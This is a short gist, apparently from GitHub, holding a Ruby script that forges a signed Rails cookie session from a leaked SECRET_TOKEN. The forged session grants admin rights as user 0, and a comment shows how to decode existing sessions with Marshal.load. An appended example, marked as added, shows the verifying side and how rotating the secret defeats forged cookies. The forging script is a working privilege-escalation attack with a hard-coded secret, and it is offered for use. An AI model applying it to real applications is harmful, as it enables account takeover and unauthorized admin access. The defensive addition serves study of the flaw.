Created April 24, 2013 18:17 (gist ledbettj/5454272)
Ruby on Rails session modifying
```ruby
#!/usr/bin/env ruby
require 'openssl'
require 'base64'
require 'cgi'

# you should snag this from the config/initializers/secret_token.rb
# which some people apparently think is a good idea to check into github.
# spoiler: not a good idea, especially if you're using the cookie session store.
SECRET_TOKEN = '7c795dafa8c781a502f6a636e39f9b5f508a3d49ea1d250c39bce61308beb6d68c8fabd928522dfdb57e26c06c8c9575244e0d7b0922c7756f6d4ca78386ab60'

# here's what you want to end up in your session
# if you don't know what should be in it, try decoding the existing session*[1]
what = { 'user_id' => '0', 'admin' => true }

session_data = Base64.encode64(Marshal.dump(what)).gsub("\n", "")
signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET_TOKEN, session_data)
session_data = CGI.escape(session_data)

puts "here's your new signed session. enjoy!"
puts "#{session_data}--#{signature}"

# *[1] Decoding existing session:
#
# require 'base64'
# require 'cgi'
#
# data = "session".split('--')[0]
# data = Marshal.load(Base64.decode64(CGI.unescape(data)))
#
# puts "Existing session data: ", data.inspect
#
```
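An added example, not part of the original gist and not Rails' own code: the verifying side of the same `data--signature` cookie layout. It shows that the secret is the only thing separating a genuine session from a fabricated one, and that rotating it makes a cookie signed with the old value fail verification. The helper names, the constructed secret and the JSON payload are assumptions.

```ruby
require 'openssl'
require 'base64'
require 'cgi'
require 'json'
require 'securerandom'

# Helper names below are hypothetical; they are not Rails APIs.

# Constant-time comparison so the check does not leak how many bytes matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def hmac(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
end

# Same "data--signature" layout as the gist, with a JSON payload.
def sign(session, secret)
  data = Base64.strict_encode64(JSON.generate(session))
  "#{CGI.escape(data)}--#{hmac(data, secret)}"
end

# Returns the session hash, or nil when the signature or encoding is invalid.
def verify(cookie, secret)
  data, mac = cookie.to_s.split('--', 2)
  return nil if data.nil? || mac.nil?
  data = CGI.unescape(data)
  return nil unless secure_equal?(mac, hmac(data, secret))
  # JSON, not Marshal: parsing cannot instantiate arbitrary Ruby objects.
  JSON.parse(Base64.strict_decode64(data))
rescue ArgumentError, JSON::ParserError
  nil
end

def rotation_demo
  leaked  = 'constructed-example-secret-committed-to-a-repo' # constructed value
  rotated = SecureRandom.hex(64) # in deployment: injected at runtime, never committed
  cookie  = sign({ 'user_id' => '0', 'admin' => true }, leaked)
  flipped = cookie[0..-2] + (cookie[-1] == '0' ? '1' : '0')
  { before_rotation: verify(cookie, leaked),
    after_rotation:  verify(cookie, rotated),
    tampered:        verify(flipped, leaked) }
end

p rotation_demo if $PROGRAM_NAME == __FILE__
```

Rotating the secret also invalidates every legitimate session signed with the old value, so users have to log in again.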